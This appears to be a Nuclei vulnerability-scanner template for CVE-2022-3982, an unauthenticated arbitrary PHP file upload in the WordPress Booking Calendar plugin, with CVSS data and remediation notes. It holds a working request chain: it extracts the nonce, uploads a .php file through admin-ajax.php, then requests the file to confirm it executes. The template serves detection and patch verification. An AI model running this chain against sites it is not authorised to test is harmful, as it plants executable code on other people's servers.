id: CVE-2022-3982 info: name: WordPress Booking Calendar <3.2.2 - Arbitrary File Upload author: theamanrawat severity: critical description: | WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. remediation: Fixed in 3.2.2. reference: - https://wpscan.com/vulnerability/4d91f3e1-4de9-46c1-b5ba-cc55b7726867 - https://wordpress.org/plugins/booking-calendar/ - https://nvd.nist.gov/vuln/detail/CVE-2022-3982 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-3982 cwe-id: CWE-434 epss-score: 0.11707 epss-percentile: 0.94689 cpe: cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 3 vendor: wpdevart product: booking_calendar framework: wordpress tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=------------------------1cada150a8151a54 --------------------------1cada150a8151a54 Content-Disposition: form-data; name="action" wpdevart_form_ajax --------------------------1cada150a8151a54 Content-Disposition: form-data; name="wpdevart_id" x --------------------------1cada150a8151a54 Content-Disposition: form-data; name="wpdevart_nonce" {{nonce}} --------------------------1cada150a8151a54 Content-Disposition: form-data; name="wpdevart_data" {"wpdevart-submit":"X"} --------------------------1cada150a8151a54 Content-Disposition: form-data; name="wpdevart-submit" 1 --------------------------1cada150a8151a54 Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" Content-Type: application/octet-stream --------------------------1cada150a8151a54-- - | GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - contains(header_3, "text/html") - status_code_3 == 200 - contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d') condition: and extractors: - type: regex name: nonce group: 1 regex: - var wpdevart.*"ajaxNonce":"(.*?)" internal: true # digest: 4a0a00473045022100800cb700a14d85afe5d13e5a947fa348b7bb5df20a6dfb60f1a0a5e9073e04bb022010f91028465d86379675e2443862ca9cbe7abbf10b941456a5f7d9fa906e5390:922c64590222798bb761d5b6d8e72950